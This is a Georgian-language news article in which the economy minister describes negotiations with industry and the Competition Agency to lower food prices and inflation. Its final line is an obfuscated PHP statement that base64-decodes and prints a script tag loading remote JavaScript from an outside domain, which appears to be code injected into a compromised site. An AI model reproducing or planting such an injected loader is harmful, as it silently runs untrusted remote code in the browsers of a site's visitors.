celsiusi
ავერსი საქკაბელი

თქვენ დაინახეთ ტენდენციები, რომ ძალიან ბევრმა ორგანიზაციამ დაიწყო ფასების კლება სასურსათო პროდუქტზე, - ამის შესახებ ეკონომიკისა და მდგრადი განვითარების მინისტრმა, ლევან დავითაშვილმა მთავრობის სხდომის დასრულების შემდეგ განაცხადა.

მედია დაინტერესდა, თუ რა ეტაპზეა მოლაპარაკებები სასურსათო პროდუქტების ფასებთან მიმართებით დაწყებულ მოლაპარაკებაზე.
„ეს პროცესი მიმდინარეობს ინტენსიურად. პროცესში ჩართულია როგორც დარგობრივი ასოციაციები, იმპორტიორთა და დისტრიბუტორთა ასოციაციები, ისე რამდენიმე საერთაშორისო ორგანიზაცია, რომელიც კვების ჯაჭვში მონაწილე კომპანიების მხარდაჭერას ახორციელებს. ასევე არიან მონაწილეები ადგილობრივი საცალო ქსელები და მათი ასოციაცია. ჩვენ გვინდა, რომ ყველა მონაწილე მხარე იყოს პროცესში და განხილვებში ჩართული იმისთვის, რომ საბოლოოდ მივიღოთ პროდუქტი, რომელიც სამართლიან კონკურენციას უზრუნველყოფს ბაზარზე და ამავე დროს, იქნება ეფექტიანი ოპერაციები, უფრო გამჭვირვალე, უფრო პროგნოზირებადი, და ზუსტად ეს შექმნის უკეთეს პირობებს, უფრო ნაკლებ ფასებს, რაც ჩვენი მთავარი ამოცანაა“, - განაცხადა ლევან დავითაშვილმა.
მისივე თქმით, მთავრობის ამოცანაა არა ბიზნესის შეზღუდვა, არამედ კონკურენტული და ეფექტიანი გარემოს შექმნა.
„ჩვენი ამოცანა არ არის, ბიზნესი შევზღუდოთ, ან რაიმე ტიპის ვალდებულებები დავაკისროთ, ისეთი, რომელიც სამართლიანი არ არის, თუმცა ჩვენთვის მნიშვნელოვანია სამართლიანი, კონკურენტული და ეფექტიანი გარემო შეიქმნას. პროცესში ჩართულია, რა თქმა უნდა, კონკურენციის სააგენტო, რომელმაც გარკვეული მოკვლევები ჩაატარა, ანალიზი დადო და ეს ინფორმაცია ბიზნესს გავუზიარეთ. თქვენ დაინახეთ ტენდენციები, რომ ეს უკვე აისახა ფასებზე, ძალიან ბევრმა ორგანიზაციამ დაიწყო ფასების კლება. ძალიან ბევრი აქცია იყო სხვადასხვა სასურსათო პროდუქტზე, ჩვენ იმედი გვაქვს, რომ ეს ტენდენცია გაგრძელდება და ეს აისახა ინფლაციის საბოლოო მაჩვენებლებზეც თებერვალში. იმედი გვაქვს, რომ მარტში ინფლაციის მაჩვენებელი კიდევ დაიწევს“, - განაცხადა დავითაშვილმა.
მინისტრის ვარაუდით, სურსათზე ფასები კიდევ შემცირდება.

352
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");